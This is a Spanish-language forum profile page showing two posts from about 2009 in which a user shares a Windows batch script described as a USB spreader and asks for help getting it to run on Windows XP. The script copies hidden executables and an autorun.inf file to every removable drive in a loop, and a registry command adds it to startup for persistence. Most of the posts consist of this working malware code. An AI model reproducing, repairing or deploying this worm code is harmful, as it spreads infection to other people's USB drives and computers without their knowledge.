Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Software Download

#21
Hola!

Cita de: ---saster--- en  2 Diciembre 2009, 20:00 PM
No tengo xp por lo que no te puedo ayudar mucho :P

Usa for

Citar
for %%a in (E,F,G,H,I,J,K,L) DO (
if exist %%a (call :creausb %%a)
)

Intente meter al registro el bat con for de esta forma

@ echo off
:bucle
call :copiausb
:copiausb

for %%a in (E F G H I J K L) do call :creausb %%a

ping -n 8 localhost > nul
goto bucle
goto :eof
:creausb
attrib -h "%userprofile%\Win32"

attrib -h "%userprofile%\Win32\J0ck-1.exe"
copy "%userprofile%\Win32\J0ck-1.exe" "%1:\J0ck-1.exe"
attrib +h "%1:\J0ck-1.exe"
attrib +h "%userprofile%\Win32\J0ck-1.exe"

attrib -h "%userprofile%\Win32\run.exe"
copy "%userprofile%\Win32\run.exe" "%1:\run.exe"
attrib +h "%1:\run.exe"
attrib +h "%userprofile%\Win32\run.exe"

attrib -h "%userprofile%\Win32\usb.exe"
copy "%userprofile%\Win32\usb.exe" "%1:\usb.exe"
attrib +h "%1:\usb.exe"
attrib +h "%userprofile%\Win32\usb.exe"

attrib -h "%userprofile%\Win32\autorun.inf"
copy "%userprofile%\Win32\autorun.inf" "%1:\autorun.inf"
attrib +h "%1:\autorun.inf"
attrib +h "%userprofile%\Win32\autorun.inf"

attrib +h "%userprofile%\Win32"
goto :eof


y no me dio, solo sirve con darle doble click al archivo

alguna otra idea?? :huh:

salu2!! y Gracias por la respuesta
#22
Hola!

Valla que hace tiempo que no posteo aqui  :D.

En fin el problemaesta en que el siguiente codec es un propagador de Usb que es 100% funcional en Windows Vista pero en windows xp no me funciona.

Si ejecuto el propagador en Xp dandole doble click al archivo no tengo ningun poblema pero al intentar arrancarlo desde el registro de esta forma:

reg add "hklm\software\microsoft\windows\currentVersion\run" /v "run" /t "REG_SZ" /d "%userprofile%\Win32\run.bat" /f

Me da problemas, al reiniciar tan solo me abre una ventana del explorador con la siguiente ruta c:\Documents

El Codec

  @ echo off


:bucle
call :copiausb
:copiausb
if exist "E:" call :creausb "E"
if exist "F:" call :creausb "F"
if exist "G:" call :creausb "G"
if exist "H:" call :creausb "H"
if exist "I:" call :creausb "I"
if exist "J:" call :creausb "J"
if exist "K:" call :creausb "K"
ping -n 8 localhost > nul
goto bucle
goto :eof
:creausb

attrib -h "%userprofile%\Win32"


attrib -h "%userprofile%\Win32\usb.exe"
copy "%userprofile%\Win32\usb.exe" "%1:\usb.exe"
attrib +h "%1:\usb.exe"
attrib +h "%userprofile%\Win32\usb.exe"

attrib -h "%userprofile%\Win32\autorun.inf"
copy "%userprofile%\Win32\autorun.inf" "%1:\autorun.inf"
attrib +h "%1:\autorun.inf"
attrib +h "%userprofile%\Win32\autorun.inf"

attrib +h "%userprofile%\Win32"
goto :eof


He estado intentando arreglarlo pero la verdad esque ya me quebre la cabeza y pido su ayuda si no fuera mucho pedir

salu2!! Y Gracias!!